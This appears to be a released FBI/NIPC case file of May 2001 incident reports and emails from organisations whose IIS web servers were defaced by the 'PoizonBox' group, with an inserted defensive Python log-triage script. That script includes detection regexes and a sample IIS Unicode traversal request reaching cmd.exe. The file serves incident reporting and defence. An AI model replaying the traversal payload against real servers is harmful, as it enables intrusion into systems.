Question19_date_of_last_update=5/1/2001 
Question19_org_work_update=My staff. 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share Info With=Infrastructure Orgs 

Question21_remarks=1. At around 12:15PM, intruders exploited a vulnerability 
in IIS 4.0 on the MMMC machine. This was detected by our remote content 
monitoring, and by an NT auditing alert. They placed 4 common start pages 
index.asp, index.htm, default.asp, and default.htm in the web directory for 
MMMC. They also attempted, but were foiled from attempting this on other 
machines. Later analysis showed that MS hotfix described at 
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp while 
applied shortly after issue was not active. We will be researching how this 
occurred and why our routine testing did not detect it. 

2. At approximately 12:45 the files were removed from the web server by the 
on-call engineer. By 1:10PM the correct file was restored and operations 
resumed. An incident report will be made to the NIPC (FBI) and we completed an 
archive of all logs, files, audit events, system state, and hacked files 
(the four placed in the directory). 

3. At approximately 6:00 we detected a dDos attack on another web server and 
our primary and secondary DNS server. Working with our ISP we quickly broke 
the DNS hack (malformed packets which loaded the server). We also blocked 
access to the 4 primary sources of the port 80 attack: China Internet 
Company, an ISP in Sweden, the University of Utah, and Verisign (we are 
still uncertain on this one). We have good data on all of these and they 
will be forwarded to the NIPC. 

4. Throughout the day we saw a much larger than normal amount of address 
space probes, but the perpetrators appear to be very good at staying "under 
the radar." We are paying special attention to 66.37.210.105, which appears 
to be the ip address used to hack the system (based in IIS logs). 

We are continuing to aggregate data for this incident. Our staff performed 
as we have in mock attacks and I believe we have captured as much info as 
possible. We continue to monitor and assess security and have staff on-site 
today working on the hotfix issue. 

I will continue to issue status reports as we gain new information. 

Subject: Incident Report 


Date: 15:54 - 
From b6 
To: “nipc.watch@fbi.gov" <nipc.watch@fbi.gov> b7C 


| was unable to use the web form so | will duplicate the fields and 
responses below: 


Report Date/Time: May 6, 2001 2:40 PM 


Contact: 


MAC DIRECT 
185 Discovery Dr. 
Colmar, PA 18915 


My Cell phone 
My home number 
Company numbe 


Incident Information: 


Attack occurred at above facility (a server housed at 185 Discovery Dr., 
Colmar, PA) 


Date and time of incident: 

Incident 1 (Website defacement) : 12:11 PM, 5/5/2001 

Incident 2 (DDos on port 80 and DNS primary and secondary): approx. 6:00 PM 
5/5/2001 


Incident 1 was detected and fixed by 12:45PM 
Incident 2 was detected and fixed by 9:00 PM 


This is a critical system/network for our client, Merck Medco 
Critical infrastructure sector: Telecommunications and healthcare 
Nature of problem: 

Intrustion 

Unauthorized root access 

Compromise of system integrity 

Has this been a problem before: 

No 

Suspect method of intrusion/attack: 

DDos and Vunerability (NT IIS 4.0 SP6.0a post service-pack hotfix applied 
but not functional. 

(http://www. microsoft.com/technet/security/bulletin/fq00-086.asp _ 
Suspected perpetrator: PoizonBox (see attached file). 

Apparent source of attack: 

Multiple sources. 

Evidence of spoofing: 

No 

OS: 

Windows NT 4.0 sp6.0a 

Security infrastructure in place: 

Incident Response Team 

Firewall 

Security Auditing Tools 

Packet filtering 

Encryption (not applicable here as is a "public" site) 


Secure Remote Access 
Access Control Lists 


XP 


| Incident Report 04 


Did the intrusion/attack result in a loss/compromise of sensitive, classifed , 
or proprietary information? 


No 

Did the intrusion/attack result in damage to system(s) or data? 
No 

What actions and technical mitigation have been taken? 


Backup of affected systems 

Log files examined (Firewall, IS) 

System Binaries checked (performed scan for changed and updated files and 
registry analysis) 

Worked with ISP (VoiceNet) to mitigate DDos 


Has the FBI local office been informed: 

No 

Has another agency/organization been informed? 
No 

When was the last system update? 

5/1/2001 by my staff. 


Is the system admin. a contractor? 


ee 


No 


You may only share this information with InfraGard Members with Secure 
Access 


Here is a status email sent to my customer: 


All problems have been addressed and corrected. However we continue to 
assess: 


Here is a chronology of events: 


1. At around 12:15PM 5/5/2001, intruders exploited a vunerability in [IS 4.0 
on the MMMC machine. This was detected by our remote content monitoring, and 
by an NT auditing alert. They placed 4 common start pages index.asp, 
index.htm, default.asp, and defauit.htm in the web directory for MMMC. They 
also attempted, but were foiled from attempting this on other machines. 
Later analysis showed that MS hotfix described at 
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp while 

applied shortly after issue was not active. VVe will be researching how this 
occured and why our routine testing did not detect it. An open incident with 
Microsoft has them reviewing our registry configuration. 

2. At approximately 12:45 the files were removed from the web server by the 
on-call engineer. By 1:10PM the correct file was restored and operations 
resumed. An incident report will be made 


to the NIPC (FBI) and we completed a archive of ali logs, files, audit 
events, system state, and hacked files (the four placed in the directory). 


3. At approximately 6:00 we detected a DDoS attack on another web server and our primary and secondary DNS server. Working with our ISP we quickly broke the DNS hack (malformed packets which loaded the server). We also blocked access to the 4 primary sources of the port 80 attack: China Internet Company, an ISP in Sweden, the University of Utah, and Verisign (we are still uncertain on this one). We have good data on all of these and they will be forwarded to the NIPC. 


4. Throughout the day we saw a much larger than normal amount of address space probes, but the perpetrators appear to be very good at staying "under the radar." We are paying special attention to 66.37.210.105, which appears to be the IP address used to hack the system (based on IIS logs). 


We are continuing to aggregate data for this incident. Our staff performed as we have in mock attacks and I believe we have captured as much info as possible. We continue to monitor and assess security and have staff on-site today working on the hotfix issue. 


I will continue to issue status reports as we gain new information. 


We have log files, etc., we can share with you. 


I am not an Infragard member (although I have the application on my desk); I would like to send any log files etc., as encrypted docs. Please let me know if you would like them and how I should encrypt them. 


b7C 
<<index.htm>> 


Name: index.htm 
index.htm Type: Hypertext Markup Language (text/html) 
Encoding: quoted-printable 
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Philadelphia received multiple telephonic complaints related to the "Honkers Union of China" website defacements. Special [redacted] of the Philadelphia Division addressed the following complaints and obtained the following information: 


1. On 05/07/2001, [redacted], Security, Neutronics, Inc., telephone number [redacted], e-mail address [redacted], advised that on 05/07/2001, 2:54 am EST the www.refrigerantid.com website was infiltrated at [redacted] Virtual Farm, [redacted] that the Refrigerant ID site was the only domain touched on the entire Virtual Farm server and no other damage was identified. The intrusion was initiated from an undetectable IP address originating in China. The hacker did not have the ability to change or delete existing data, but did add a new .asp page which was coded to default as a home page. The .asp page contained the following message: "fuck USA Government, fuck PoizonBOx." (b6, b7C) 


2. On 05/08/2001, [redacted], Toplink, Inc., 103 East Pennsylvania Blvd, Feasterville, PA 19053, telephone number [redacted], reported that at 9:00 a.m. this morning he discovered that 12 of their 18 websites were defaced from the same server by an unidentified intruder. The message was something like "fuck the U.S." Toplink was unable to identify a source IP address for this attack. Toplink runs a Windows NT 4.0 server with no Intrusion Detection System (IDS) used. (b6) 


3. On [date illegible], [redacted], ERW Graphics, Inc., 9100 Pennsauken Highway, Pennsauken, NJ 08110, telephone number [redacted], e-mail address [redacted], advised that their firewall captured an unknown intruder attempting to run an exploit through port 80, using a script at the URL command prompt. The attack was directed at their Windows NT 4.0 server at 12:15 EST this afternoon. [redacted] identified the source IP address of the attacker as follows: 202.103.209.37. [redacted] was also able to capture a root.exe file that was attempted to be executed by the attacker. (b6, b7C) 


4. On 05/[illegible]/2001, [redacted], Dilworth Paxson, LLP, 1735 Market Street, Philadelphia, PA, telephone number [redacted], advised that their network was experiencing attempted intrusions from an IP address originating in China. [redacted] directed the interviewing agent to [redacted], telephone number [redacted], for technical detail related to this intrusion. (b6, b7C) 

[redacted] that the attack compromised their Sun Solaris server and began conducting searches for .gov and .us IP address domain names. Yesterday [redacted] that the rpclog command had been changed over the weekend. [redacted] was forced to reboot the system 11:00 a.m. the following Monday morning. This attack appeared to be the IIS Worm identified in the CERT alert earlier that morning. 


5. On [date illegible], [redacted], [redacted] General Hospital, telephone number [redacted], advised that their firewall captured an attempted intrusion from IP address 210.77.161.131. [redacted] stated that this intrusion was unsuccessful and the IP address may resolve back to the University of China. [redacted] described their system as a Windows NT network with a Check Point Firewall. 


6. On 05/10/2001, [redacted], Philadelphia University, telephone number [redacted], advised that their Sun Solaris server was compromised by the sadmind/IIS Worm. [redacted] was unable to capture any useful logs or files related to this worm. 


b6 


b7C 


b6 
b7C 


b6 
b7C 


From: - 


To: 
Date: 5/15/01 6:37PM 
Subject: China Intrusion 


Subject: Cyber Incident Report Form 


Date: [redacted] 
From: [redacted] 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> 


Report_date_time=15 MAY 01/1620 EDT 
Organization=Ciber 
Addrs_Street=650 Wilson Lane 
City=Mechanicsburg 
State=PA 
Zip Code=17055 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number=[redacted] 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country=USA 
Question1_Email=HBGHelpdesk@ciber.com 
Question2_Location=650 Wilson Lane, Mechanicsburg PA, 17055, 2nd floor, Server Room; 1st floor, Server Room; and 600 Wilson Lane, Mechanicsburg PA, 17055, 2nd floor, Server Room 
Question3_Date_Time=03 MAY 01 - 0130EDT 
Question4_Critical=No 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=On May 3rd, 3 of our servers were penetrated by the HTTP service. The first server, SQL-IIS, was hit shortly after 0130. There were about 30 entries of HTTP service in the Firewall-1 Log file in a 30 second span. The next server, NODE1147, was hit right after that. That penetration lasted 23 seconds and there were about 100 entries in the log. The last server, PServer15, was hit right after that. There were about 90 entries in the log in 16 seconds. Each of these servers had a dump of default.htm, default.asp, index.htm & index.asp files put in numerous directories. All of the pages that were looked at said, "fuck USA Government, fuck PoizonBOx, contact:sysadmcn@yahoo.com.cn". A file called root.exe was found on each PC. 
Question9_sus_perpetrators=Unknown 
Question9_Remarks=No Remarks 
Question10_ip_addrs=WS141113.geography.siu.edu 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=NT 
Question12_Remarks=Windows NT Server 4 & IIS4 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question14_attack_loss_info=No 
Question14_Remarks=None 
Question15_damage_systms=Yes 
Question15_Remarks=The PServer15 server lost some newly generated web pages that had to be redeveloped by that project team. 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=Node1147 was no longer in production and was taken down. PServer15 was patched and Internet access removed. A stand alone FTP server was created for the project team. Internet access to the SQL-IIS box was tightened. That server is scheduled to be rebuilt on 17 MAY 01. 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=Yes 
Question18_State_local_Police=Upper Allen Township Police - 7177952445 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other=An incident report was filed with CERT 
Question19_date_of_last_update=Varies 
Question19_org_work_update= 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Question21_remarks=A scan of HTTP accessible systems occurred around 2230 on May 2nd. The scan was by IP address and took 3 seconds to scan our 16 servers. ONLY the HTTP service was used. The scan came from "WS141113.geography.siu.edu". 
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Squad 9 

From: [redacted] b6 
To: Squad 9 <sq9.ph@fbi.gov> b7C 
Sent: Wednesday, May 16, 2001 11:55 PM 


Subject: Re: Chinese Hackers 


PointAll Corporation 

950 Tilton Road 

Suite 103 

Northfield, NJ 08225 

P. 609-641-7500 ext. [redacted] 


thanks 


[redacted] 


----- Original Message ----- 


From: Squad 9 
Sent: Wednesday, May 16, 2001 3:42 PM b7c 


Subject: Chinese Hackers 


We are collecting information on the victims of the Chinese Hacker web defacements. Please send us your 
full name, business name, business address, and contact day phone number so we can forward it to our HQ 
handling the matter. 


Thank you. 


FBI Philadelphia --Squad 9 

NIPC Computer Intrusion Program 

(215) 418-4000 

National: http://www.nipc.gov 

Local PH Chapter: http://infragard.hmconsulting.net/index.html 


The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination, or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. 


5/17/01 


To: 
Date: 5/16/01 4:26PM 
Subject: POISONBOX VICTIM 


[redacted] Inc. STE [redacted] 
710 Floral Vale Boulevard 

Yardley, PA 19067 

(215) 579-8111 



FBI Philadelphia - Squad 9 

NIPC Computer Intrusion Program 

(215) 418-4292 

National: http://www.nipc.gov/ 

Local PH Chapter: http://infragard.hmconsulting.net/index.html 


The information transmitted is intended only for the person or 
entity to which it is addressed and may contain confidential 
and/or privileged material. Any review, retransmission, 
dissemination, or other use of, or taking of any action in reliance 
upon, this information by persons or entities other than the 
intended recipient is prohibited. If you received this in error, 
please contact the sender and delete the material from any 
computer. 


b6 
b7C 


Subject: Cyber Incident Report Form 


Date: [redacted] 
From: [redacted] 
To: "nipc.watch@fbi.gov" <nipc.watch@fbi.gov> 


001; 11:00 am 


Organization=Hershey Foods Corporation 
Addrs_Street=200 Crystal A Drive 
City=Hershey 
State=Pa 
Zip Code=17033 
Country=USA 
Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 
Question1_Street=SAME 
Question1_City_State_Zipcd= 
Question1_Country= 
Question1_Email= 
Question2_Location=200 Crystal A Drive, Hershey PA 
Question3_Date_Time=May 8, 2001; 6:30am 
Question4_Critical=Yes 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=Front-end web server to remote partners 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=Appears to have been exploit of the IIS "web server folder traversal" (MS00-078/057) 
Question9_sus_perpetrators=Unknown 
Question9_Remarks=No Remarks 
Question10_ip_addrs=2106.234.227.6 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=Windows 
Question12_Remarks=NT4 (SP6a) running IIS 4.0 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Banners 
Question14_attack_loss_info=No 
Question14_Remarks=No Remarks 
Question15_damage_systms=Yes 
Question15_Remarks=appears limited to defacement of the web page and creation of new web folders containing copies of the defaced page 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=affected machine removed from service pending rebuild & redeployment; existence of appropriate patches verified/applied to similar machines 

b6 
b7C 

Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=Yes 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other=TruSecure Corp 
Question19_date_of_last_update=Dec 19-20, 2000 
Question19_org_work_update=Hershey Foods NT admin group (our own staff) 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Question21_remarks=defaced page read: 

f*** USA Government 
f*** Poizon BOx 
contact:sysadmcn@yahoo.com.cn 

IP source address traced to ThePlanet.com Internet Services, Dallas TX. 

Have examined (and am retaining) copies of NT event, IIS and firewall logs. 


From: - 


To: 
Date: 5/16/01 7:57PM 
Subject: Incident Report, Chinese Web Defacement. 


The following incident report was received by the NIPC Watch. It involves a telecommunications firm 
that suffered a Web defacement from an apparent Chinese hacker group. It was not assigned an 
Incident Report number, and is being forwarded for your information/action. 


Regards, 
NIPC Watch and Warning Unit. 


Subject: Cyber Incident Report Form 


Date: Wed, 16 May 2001 12:15:52 -0400 
From: [redacted] b6 
To: <nipc.watch@fbi.gov> b7C 


Report_date_time= 
Name=[redacted] 
Title=[redacted] 
Telephone_Fax_Number=610-375-8425 [redacted] 
Email=[redacted] 
Organization=Unconundrum 
Addrs_Street=42 South 5th St. 
City=Reading 
State=PA 
Zip Code=19602 
Country=USA 
Question1_Organization=Prince Law Offices 
Question1_Contact_Info=[redacted] 
Question1_Tele_Number=[redacted] 
Question1_Street=646 Lenape Road 
Question1_City_State_Zipcd=Bechtelsville, PA 19505 
Question1_Country=USA 
Question1_Email=troubleshooters@princelaw.com 
Question2_Location=second floor computer room connected to the internet through a wan connection to the office in Reading, PA, behind a Checkpoint Firewall-1 
Question3_Date_Time=05/15/2001 23:28 - 23:36 
Question4_Critical=Yes 
Question5_crit_infrasture=Other 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=corporate intranet 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=Yes 
Question7_Remarks=Happened before on 05/07/2001 7:50 AM and 05/12/2001 12:23 AM, thought we patched the hole but didn't 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=we installed snort to do intrusion detection and discovered the attempt last night to exploit a server using the IIS Unicode bug 
Question9_sus_perpetrators=Other 
Question9_Remarks=pro-chinese anti-us rhetoric related to the following advisory http://www.nipc.gov/warnings/advisories/2001/01-009.htm 
Question10_ip_addrs=210.46.96.1 
Question11_evid_of_spoof=Unknown 
Question12_oper_systems=NT 
Question12_oper_systems=Windows 
Question12_Remarks=Windows 2000 advanced server and IIS 5.0 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Intrusion Detection System 
Question14_attack_loss_info=Unknown 
Question14_Remarks=unknown, but our exchange server was compromised which contains a lot of sensitive legal information for the law office 
Question15_damage_systms=Yes 
Question15_Remarks=so far all we know that was damaged was the front page of the intranet website, which was restored from a backup immediately 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Backup of affected system(s) 
Question16_what_actions=Other 
Question16_what_actions=Log files examined 
Question16_Remarks=ips related to the attack have been added to firewall and blocked all traffic, backup in progress and will be moving exchange mail server and intranet website to a newly installed server tonight 
Question17_Field_Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local_Police= 
Question18_Inspector_General= 
Question18_CERT-CC= 
Question18_FedCIRC= 
Question18_JTF-CND= 
Question18_Other= 
Question19_date_of_last_update=05/15/2001 
Question19_org_work_update=we did (intranet website is constantly modified in house) 
Question20_POC_Information= 
Question20_sys_adm_contract=No 
Share_Info_With=Infrastructure Orgs 
Question21_remarks=No additional remarks 
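Added here as an illustration, not code from the FBI file or from any of the reporting organizations: a defender-side triage of IIS W3C extended log lines for the indicators the Ciber, Hershey and Prince Law reports above describe, namely the IIS "web server folder traversal" (MS00-078, the Unicode bug) request pattern, requests for cmd.exe or root.exe, and a burst of HTTP hits from one source within a few dozen seconds. The log lines and IP addresses are constructed sample data, and the field order is the common IIS 4/5 W3C layout, assumed here.

```python
"""Triage of IIS W3C extended log lines for the indicators described in the
incident reports above. Constructed example; the log excerpt is synthetic."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Assumed field order of the W3C extended log as IIS 4/5 commonly wrote it.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# Over-long UTF-8 encodings of '/' and '\' that IIS 4/5 decoded only after
# its path-traversal check (the "web server folder traversal" bug, MS00-078).
OVERLONG_SLASH = re.compile(r"%c0%af|%c1%9c", re.IGNORECASE)
# Shells named in the reports: cmd.exe, and root.exe, the copy of cmd.exe the
# victims found on each compromised host.
SHELL_NAMES = re.compile(r"(?:^|/)(?:cmd|root)\.exe$", re.IGNORECASE)


def parse_line(line):
    """Split one W3C log line into a dict; None for directives and blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return rec


def classify(rec):
    """Names of the indicators a single request matches (empty list if clean)."""
    hits = []
    stem = rec["cs-uri-stem"]
    if OVERLONG_SLASH.search(stem):
        hits.append("overlong-utf8-traversal")
    # Normalise the way the vulnerable server effectively did: treat the
    # over-long sequences as separators, percent-decode, then look for
    # directory climbing that escapes the virtual directory.
    decoded = unquote(OVERLONG_SLASH.sub("/", stem)).replace("\\", "/")
    if "/../" in decoded or decoded.endswith("/.."):
        hits.append("dot-dot-traversal")
    if SHELL_NAMES.search(decoded):
        hits.append("shell-invocation")
    return hits


def bursts(records, window_seconds=30, threshold=20):
    """Source IPs that made at least `threshold` requests inside any window.

    Mirrors the pattern the Ciber report describes (tens of HTTP hits on one
    server within about 30 seconds). Returns {ip: max requests in a window}.
    """
    by_ip = defaultdict(list)
    for rec in records:
        by_ip[rec["c-ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > timedelta(seconds=window_seconds):
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def triage(lines, **burst_opts):
    """Return (flagged requests, burst sources) for an iterable of log lines."""
    records = [r for r in map(parse_line, lines) if r]
    flagged = []
    for rec in records:
        hits = classify(rec)
        if hits:
            flagged.append((rec["c-ip"], rec["cs-uri-stem"], hits))
    return flagged, bursts(records, **burst_opts)


def sample_lines():
    """Constructed log excerpt (documentation-range IPs): one traversal probe,
    one call to the dropped shell, then 25 hits in 25 seconds from one source."""
    head = [
        "#Software: Microsoft Internet Information Server 4.0",
        "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
        "2001-05-03 01:30:02 192.0.2.10 GET /default.htm - 200",
        "2001-05-03 01:30:05 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe - 200",
        "2001-05-03 01:30:06 192.0.2.10 GET /scripts/root.exe - 200",
        "2001-05-03 01:30:40 198.51.100.7 GET /index.asp - 200",
    ]
    burst = [f"2001-05-03 01:31:{i:02d} 192.0.2.10 GET /scripts/root.exe - 200" for i in range(25)]
    return head + burst


if __name__ == "__main__":
    requests, sources = triage(sample_lines())
    for ip, stem, hits in requests:
        print(f"{ip} {stem} -> {', '.join(hits)}")
    for ip, n in sources.items():
        print(f"burst: {ip} made {n} requests within 30 s")
```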
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Name of Office 
Subject: [illegible] 
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National Infrastructure Protection Center 
Incident Reports 


Cyber Threat and Computer Intrusion Incident Reporting Guidelines 

This form may be used as a guide or vehicle for reporting cyber threat and computer intrusion incident information to the NIPC or other law enforcement organization. It is recommended that these Cyber Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office. 

Do NOT include CLASSIFIED information on this form unless you adhere to applicable procedures for proper marking, handling and transmission of classified information. Please contact NIPC Watch Operations Center (202) 323-3205 to arrange secure means to submit classified information. 

Information concerning the identity of the reporting agency, department, company, or individual(s) will be treated on a confidential basis. If additional information is required, you will be contacted directly. 


Report Date/Time: May 10 2001 

SECTION 1 

Point of Contact (POC) Information 

Name: [redacted] 
Title: [redacted] 
Telephone/Fax Number: [redacted] 
Organization: Adis International Inc 
Address: Street: 820 Town Center Drive 

http://www.nipc.gov/incident/cirr.htm 05/10/2001 
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ADIS INT'L, INC. PAGE 03/07 
National Infrastructure Protection Center (NIPC) - Incident Report - Intellectual Property R.. Page 2 of 6 


Incident Information 

1. Name of Organization: (if same as above, enter "SAME") 
SAME 
(Check here if Federal Government) 
Organization's contact Information: 
SAME 
Telephone Number: [redacted] 
City, State, Zip Code: [redacted] 

2. Location: Auckland New Zealand and the other is located in 511 Avenue of the Americas, NY NY 1011 


3. Date/Time and duration of incident: 

4. Is the affected system/network critical to the organization? Yes / No 

5. Critical Infrastructure sector(s) affected. (Check all that apply) 
Power; Transportation; Banking and Finance; Emergency Services; Government Operations; Water Supply Systems; Gas & Oil Storage and Delivery; Other (Provide details in remarks); Telecommunications; Not applicable 
(The checkbox selections on this and the following items are not legible in the scan.) 
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Remarks: Auckland site is email. New York site is an ecommerce site. 


6. Nature of Problem? (Check all that apply) 
Intrusion; System impairment/denial of resources; Unauthorized root access; Web site defacement; Compromise of system integrity; Hoax; Theft; Damage; Unknown; Other 


7. Has this problem been experienced before? (If yes, please explain in remarks section): Yes / No 

Remarks: No Remarks 


8. Suspect method of intrusion/attack 
Virus (provide name if known); Vulnerability exploited (explain); Denial of Service; Trojan horse; Distributed Denial of Service; Trapdoor; Unknown; Other (Provide details in remarks) 
Remarks: IIS (Web Server) leaks. Patched by applying appropriate patches. 


9. Suspect perpetrator(s) or possible motivation(s) of the attack 
Insider/Disgruntled employee; Former employee; Competitor; Other (Explain in remarks); Unknown 

Remarks: No Remarks 
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10. The apparent source (IP address) of the intrusion/attack: 

11. Evidence of spoofing? Yes / No / Unknown 

12. What computers/systems (hardware and software) were affected? (Operating system, version): 
Unix; OS/2; Linux; VAX/VMS; NT; Windows; SunOS/Solaris; Other (Please specify in remarks) 
Remarks: 

13. Security Infrastructure in place. (Check all that apply) 
Incident/Emergency Response Team; Encryption; Firewall; Secure Remote Access/Authorization tools; Intrusion Detection System; Banners; Security Auditing Tools; Access Control Lists; Packet filtering 

14. Did the intrusion/attack result in a loss/compromise of sensitive, classified or proprietary information? Yes (Provide details in remarks) / No / Unknown 
Remarks: No Remarks 

15. Did the intrusion/attack result in damage to system(s) or data? Yes (Provide details in remarks) / No 
Remarks: No Remarks 
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16. What actions and technical mitigation have been taken? 
System(s) disconnected from the network; System Binaries checked; Other (Please provide details in remarks); Log files examined; No action(s); Backup of affected system(s) 
Remarks: Web server patches have been applied to the New Zealand site. We are in the process of patching the New York site. 

17. Has the local FBI field office been informed? Yes (Which Office) / No 

18. Has another agency/organization been informed? If so, please provide name and phone number. Yes / No 
State/local police: 
Inspector General: 
FedCIRC: 
JTF-CND: 
Other (Incident Response, law enforcement etc.): 

19. When was the last time your system was modified or updated? 
Date: unknown 
Company/Organization that did work (Address, phone, POC information): 

20. Is the System Administrator a contractor? Yes (Provide POC Information) / No 


b6 
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21. In addition to being used for law enforcement or national security purposes, the intrusion-related information I reported may be shared with: 
The Public; InfraGard Members with Secure Access 

22. Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted separately.) 
The messages that were left on both sites were identical: "fuck USA goverment Fuck PoizonBox" 

If the reported incident is determined to be a criminal matter you may be contacted by an agent for additional information. 
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Squad 9 

From: 

To: Squad 9 <sq9.ph@fbi.gov> 
Sent: Friday, May 18, 2001 9:15 AM 


Subject: Re: website hacker 


Hi - per your request, our business name and address is Strafford Mechanical, Inc., 37 Industrial Boulevard, Paoli 301. Thanks, 


----- Original Message ----- 


| From: [redacted] 
| To: [redacted] 
| Sent: Friday, May 18, 2001 8:51 AM 
| Subject: Re: website hacker 




| [redacted]: 
| Thanks for informing us of your incident. Please send me your business name, business address, we are collecting information on victims (there are several) in the Eastern PA area and are addressing the issue. I have your name and phone but need the other two pieces of info to put in our database. 
| 
| Thanks. 
| 
| FBI Philadelphia - Squad 9 
| NIPC Computer Intrusion Program 
| (215) 418-4000 
| National: http://www.nipc.gov 
| Local PH Chapter: http://infragard.hmconsulting.net/index.html 
| 
| The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination, or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. 


----- Original Message ----- 
From: [redacted] 
To: sq9.ph@fbi.gov 
Sent: Thursday, May 17, 2001 5:12 PM 
Subject: website hacker 


Hi - My website pages of straffordm.com were replaced by a hacker who wrote "fuck the usa government fuck poison box". It is still available to see via google search and clicking on links offered for straffordm.com. 

I did a search of both phrases and despite there being many similarities, the phrase as noted seems somewhat unique to our invasion. We are working on the problem internally, but I wanted to contact you. 


Strafford Mechanical, Inc. 


5/18/01 
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Squad 9 

From: b6 
To: Squad 9 <sq9.ph@fbi.gov> b7C 
Sent: Wednesday, May 16, 2001 10:12 AM 


Subject: Help please - Pirated Programs and Outside Attack 

On Monday of this week we discovered and stopped a hacker group from using our FTP site as a store and forward point for what appeared to be pirated Sega files. Since that point in time we now appear to be under a concerted attack from all over the globe in an attempt to breach our systems. I have been asked by the president of our firm to contact you and to provide you with whatever information and assistance I can to help you find, stop and prosecute the individuals involved. 

I am afraid that they may have successfully breached our security and am now in the process of shutting down as many services that could be providing them holes. 

The sites presently under attack are in the IP range 205.146.157.1 with a subnet mask of 255.255.255.192. 
I appreciate any help or assistance you can provide in this matter. 


Cordially, 


b6 
b7C 


Technomic Publishing Company 
851 New Holland Ave., Box 3535 
Lancaster, PA, 17604 
U.S.A. 
Voice: [redacted] 
Fax: (717) 295-4538 
E-Mail: [redacted] 
Websites: 
http://www.techpub.com 
http://www.tcl.to 
http://www.healthpack.net 
http://www.air-bag.net 
http://www.flavor-works.com 
http://www.compositesoftware.com 
http://www.technomicjournals.com Under Construction 


While attachments are virus checked, Technomic Publishing Co., Inc. does not accept any liability for a virus 
which is not detected. 


5/16/01 


Complaint Form 
FD-71 (Rev. 4-13-92) 

NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative / See below 
Subject's name and aliases: CHINA.NET HUNAN PROVINCE NETWORK (VILLAGEAUCTION.COM) 
Character of case: Computer hacker 
Complaint received: Personal / Telephonic. Date: [illegible] 
Complainant's address and telephone number: [redacted] 
Complainant's DOB / Race / Sex: [redacted] 
Subject's Description: Sex / Height / Birth Date and Birthplace / Weight / Complexion / Social Security Number / Scars, marks and other data: [blank] 
Facts of complaint: [handwritten, largely illegible in the scan; legible fragments mention VILLAGEAUCTION.COM and a phone call from the FBI] 

Do not write in this space. 
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(Complaint received by) BLOCK STAMP 
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From: [redacted] b6 
To: [redacted] b7C 
Sent: Thursday, May 17, 7:18 PM b7E 
Attach: nsmailJ2.TMP 
Subject: [Fwd: FW: website defacement report] 

[redacted]: 
b7C 
Here is the info regarding reported attacks on systems of Chinese origins. The forwarded info is from the message I received from Penn State University, Harrisburg, PA Campus [redacted] advised PSU Main Campus advised him that they would be the main point of contact for the University. However [redacted] reported the incident at our local campus. 


The following are other victims: 


MILLER'S CAPITAL INSURANCE 
805 North Front Street 


Harrisburg, PA 17102 
POC: b6 
Telephone BIC 


DELOITTE CONSULTING GROUP 
3600 Vartan Way 


Harrisburg, PA 17110 

POC,| | 
telephone 717/651-2858 

fax 717/651-2819 


